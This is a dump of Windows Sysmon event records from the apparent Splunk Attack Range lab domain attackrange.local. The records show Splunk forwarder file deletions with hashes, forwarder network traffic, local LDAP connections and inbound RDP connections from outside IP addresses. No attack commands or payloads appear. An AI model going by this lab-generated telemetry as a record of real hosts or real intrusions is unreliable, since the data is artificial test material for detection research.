Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEDCB9514CE242F55D0E8C0B35B9A41F,SHA256=AEAA8837B4087199BE5F0074A4FD504CE9447B7C77200379A4B318D6B63CE27C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:08.721{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B002ECD31FB6A8220954E1DBDCB1BB02,SHA256=B04896895F567D6FEFBCCA678870D7F60E439D7477325C252F3336F807415DD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:08.638{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D271F9112BBE7FE8BB227A63E611457,SHA256=CFA2907CC4A9434DF28D8E31D300DC61AD29E9E9685513456D7F5B93CA10594C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978259Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:04.465{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62839-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978258Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:03.714{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59352-false10.0.1.12-8000- 23542300x8000000000000000978261Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:09.945{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7285F93D5E7FE01FA7D077F97F5617AA,SHA256=AEEBB0F1581F908D9EA51B5C7EB462F4AF57667CE74EA9AB8B563329C9DA5D18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:09.656{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE0804402C4C1CB1840D61C4C2685DAB,SHA256=6394E418C30723A0C546DE77FD293E861F362C2EEE7119F5377AF1032BA10483,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:07.102{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64017-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978262Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:10.945{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31D67B0C6C7A583855047C2E21846EF9,SHA256=B5C3DB61B23BC1BF60E4CDA5074C198E5AC7A5938C2991339BC92AF89A42FBC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:10.672{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6370A849F938C5F7763DC9A1C190B507,SHA256=B9156FE99ABFBFB29F8F5CB1285B3C74BEE43AD97FCBE5CB7A095615DD1ABDAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:10.018{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEDCB9514CE242F55D0E8C0B35B9A41F,SHA256=AEAA8837B4087199BE5F0074A4FD504CE9447B7C77200379A4B318D6B63CE27C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978263Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:11.960{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB5931A60F06FA66C9F03A174304621A,SHA256=3AF837EA2BA2A0670BF8953E4031711B357B354A1F70C43C5D2FE87DD5BB43EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:11.702{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28144FAAD3E7F35ED5A8AB7BDF37FAE0,SHA256=50964FCFC0268BF5675620D8EECBE874C387D1A94AF619F6B2461BCF79BCCB1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:09.332{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com50846-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:08.811{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53328-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000978267Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:12.976{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46E62B3682796F6D6ABD7A6A5757CBA4,SHA256=4F41268CC3D0C9CC89BEE0A40A3A79DF21843566E1D5991BD4817D3BE5AEB117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:12.738{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37449C625079C719FE4385773D8A6A2D,SHA256=1EA13B5A09E68133B3A3A6F5083749697DD9B99C46164682978D425F9AFCA7ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978266Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:12.695{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AEA5AF220498139BE9D100976ECC4F7D,SHA256=8736F9435387BC696B4614FD8BD426B1D61FA81E5B0532ABE03EB699C66801C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978265Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:12.695{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1D6D291B3139C614E0856038EBAD2FD,SHA256=697D1A94D1BF285629AB2F51391B0DF2FEF9594E275DE554AC1CDD27EE65A48D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978264Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:09.729{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59353-false10.0.1.12-8000- 354300x80000000000000001049665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:10.832{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49760-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978270Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:13.992{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345D7F236C8706B6BCE6BAF75EC52B81,SHA256=C02DA8B458976CEB5362A972ACCE99354CF47904C569AA7EBA27BC706470A4FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:13.756{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCA9335FCF954D7DA6F45457EFBBAC10,SHA256=D1456B05B3339DC7DF76D1BF116AFFFF9A1665D6BF2930C1A99B4ECFE49AEC2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978269Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:10.169{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-50704-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978268Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:13.617{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:11.703{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de49783-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:13.156{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A2C707B4396A75F2DC7FF0ADBBB4EA9,SHA256=2A2FDA5B2E06E08FB20ABF9B6F58089F99E7ABF0CC6294237BEB5134B4E6735D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:14.770{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFFE79D0507DBD62D7E4E0C2C05798AA,SHA256=E7F34792D14A845F31B520B31C2DDA0F2ED29842A1F021332EC5FC55CE730757,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:15.785{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9D572658D8664E5C859EDB228C5D30,SHA256=5022B34EA681B26678E06D375B03E2F61D0F87D582E8A4D06AE3D684EDE8F898,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978272Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:12.245{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59354-false10.0.1.12-8089- 23542300x8000000000000000978271Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:15.007{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE710E370B73771B2857B380A47EE9CB,SHA256=3BC075CB43364DB9E40D62A5ADBEFBC7786F3231616532D4ACC769D5A7780942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:16.803{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F099CE74B360E8935A5B6C2E223BFE,SHA256=129F0A7A936568414798CE6B1B559EF1E8682FC60181BA7A99ADF2F4829313A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978275Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:13.571{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54907-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978274Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:16.273{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AEA5AF220498139BE9D100976ECC4F7D,SHA256=8736F9435387BC696B4614FD8BD426B1D61FA81E5B0532ABE03EB699C66801C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978273Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:16.007{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5ECDB780B944DC4DB8427501B5D2E68,SHA256=6BCDE0BCD04C5622C98B45ADB48DE36A518309C40E7EF95A47A74E8948D9D0A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:14.727{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53329-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:17.835{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65EB16BAE7A189CAD0F434D668588257,SHA256=5E3C851A4DD00CAE8A3DB67BE6D27FB5DB2271954D50489746734A733CD70F5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978277Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:14.823{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59355-false10.0.1.12-8000- 23542300x8000000000000000978276Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:17.023{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4DAF725A99B1A784F2DDF8B619CF013,SHA256=2B6C4EC76908F8BA9AC95FB32FE15D525E9F13D16D13909BA7EE11C83A0FAF9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:17.355{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7EF1F156C147C18D2EE54BAA969E1E5,SHA256=B27729895D5BB6A38F888B91A9EC6DEB1B001B739ED788E2CA8D302CB7D66690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:18.854{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF71420D649CF3F3761384A025BCFF9E,SHA256=BAD59DCD92C3499FC825ADD1E587FAAABB07633016AFF07C4C2B58571DFB13A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978278Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:18.039{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6412FA57B92B8EB5801AB656096CB7C,SHA256=41B007495287B5D4C2764EDD1874A5A07E942E1F7CBB47A3E5ED6A1EB69804DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:16.025{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53330-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001049676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:16.025{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53330-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001049681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:19.868{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F330D62CCE5C5CD6DBBE8BD91A7ED6EC,SHA256=643209A79E9E2FCFF1516652C905C5004761AC1DE909C612330627A6202A67A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978279Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:19.054{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3633E320AB22831454E377700CD13775,SHA256=063C532D113516658B0B137E050DE10369D58B14C8225231C5B53F4EEF0A8E2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:16.672{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53403-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:19.116{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6B59B1FB74E741465FCE611CCEFAA60,SHA256=BC9D08346E8ECE7B7CA442C3BCFD9630E41C79EB58A5E1630898354328C79AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:20.899{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D609692D57776E91E87A69B8DD8D7D0,SHA256=9A7D6C3EF97395A363F90152F8F4A09F880D7E05AD19EAA96831A2675F7A4DF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978280Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:20.070{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01955C77DEBADDC5C6C1901921E4C463,SHA256=C28F25B5F03465D913BE4D54B6429F7FEE76B31114E23258E5E18B44CB123F32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:21.914{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB7D43BCD9678C942163AF7E460C1E4,SHA256=E5CE744D06E492B3CB908D52806E08DFDDC7D6229716D024FD72005D399F4D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978281Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:21.085{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D9EAD16D1EA7777F1B024097D9D1C2A,SHA256=64BFB6E2AC133114113F53E3E7D7FE5A201CAABA2954E5134D4B258C4AAA4DD4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:19.922{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53331-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:22.931{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=697B4A7D112AE01FFB6E69B883E9516A,SHA256=544EC8738825ADF5206BE65F99CBCAE2CF851C4E3EB6DA39CA907FEED56B69F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978282Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:22.320{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=302090C8EBAD4BECF29347FADC038C94,SHA256=335959DE53F76561190C6A1AB7F9FF428BE433CF704F510E7B621CE5CEDFA4F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978285Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:20.823{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59356-false10.0.1.12-8000- 354300x8000000000000000978284Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:20.786{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56536-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978283Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:23.555{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program 